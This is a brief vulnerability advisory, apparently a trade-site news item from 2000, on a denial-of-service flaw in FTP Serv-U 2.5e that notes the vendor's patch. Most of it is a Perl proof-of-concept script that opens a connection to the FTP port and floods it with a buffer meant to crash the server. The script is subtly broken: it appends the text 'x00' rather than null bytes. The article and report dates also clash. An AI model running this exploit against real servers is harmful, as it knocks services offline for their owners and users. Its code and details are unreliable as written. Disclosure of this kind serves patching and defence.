FTP Serv-U 2.5e Subject to Denial of Service

By sending 5000 null bytes to the FTP service, the service can be made to crash.

ITPro Today

August 6, 2000

1 Min Read
ITPro Today logo in a gray background | ITPro Today

 

Reported August 7, 2000 by Blue Panda

VERSIONS EFFECTED

FTP Serv-U 2.5e DESCRIPTION

The Serv-U FTP service can be made to generate stack faults by sending the service approximately 5000 null bytes. Such an attack could render the underlying operating system unstable where it may eventually crash.

DEMONSTRATION

#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#

use IO::Socket;

$host = "ftp.host.com";
$port = "21";

print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.";
print "done.";

$counter = 0;
$buf = "";
while ($counter < 5000) {
$buf .= "x00";
$counter += 1;
}
print $socket "$buf";

sleep(4);
close($socket);

VENDOR RESPONSE

The vendor, Deerfield, is aware of the problem and has released a patched version 2.5f.  

CREDIT
Discovered by Blue Panda

Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

You May Also Like